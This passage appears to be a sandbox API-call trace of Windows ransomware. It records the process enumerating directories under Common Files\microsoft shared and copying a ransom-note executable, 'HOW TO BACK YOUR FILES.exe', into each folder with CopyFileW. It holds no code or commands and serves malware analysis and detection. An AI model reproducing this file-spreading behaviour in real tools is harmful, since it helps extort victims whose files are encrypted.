returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument" [0056.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0056.813] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument") returned 125 [0056.813] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument" [0056.813] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.813] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.819] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.819] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535f0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535f0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.819] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.819] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.819] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" [0056.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0056.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0056.819] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned 61 [0056.819] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" [0056.819] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.819] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.835] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.835] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52622770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535f0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535f0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.835] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.835] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.836] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86" [0056.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0056.836] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86") returned 65 [0056.836] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86" [0056.836] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.836] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.842] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.842] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5272d110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53616460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53616460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.842] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.842] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.842] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" [0056.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1988 | out: hHeap=0x2b0000) returned 1 [0056.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0056.842] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned 56 [0056.842] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" [0056.842] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.842] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.847] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.847] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.848] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.848] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.848] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" [0056.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0056.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0056.848] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned 55 [0056.848] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" [0056.848] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.848] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.853] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.854] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.854] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.854] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" [0056.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0056.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0056.854] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned 61 [0056.854] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64" [0056.854] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.854] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.859] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.859] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e46d20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.860] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.860] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.860] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" [0056.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1908 | out: hHeap=0x2b0000) returned 1 [0056.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0056.860] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned 56 [0056.860] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA" [0056.860] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.860] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.866] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.866] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x53662720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53662720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.866] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.866] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.866] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" [0056.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0056.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0056.866] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned 61 [0056.866] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" [0056.867] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.867] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.873] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x53662720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53662720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.873] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.873] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.873] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" [0056.873] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0056.873] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0056.873] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned 60 [0056.873] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit" [0056.873] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.873] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\triedit\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.878] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.878] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.878] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.878] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.878] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" [0056.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0056.878] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned 66 [0056.878] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" [0056.878] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.878] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\triedit\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.883] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.883] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.883] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.883] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.883] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" [0056.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0056.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0056.883] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned 61 [0056.883] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv" [0056.883] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.883] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.890] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.890] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53688880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53688880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.890] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.890] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.890] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" [0056.890] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.890] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0056.890] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned 69 [0056.890] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" [0056.890] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.890] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 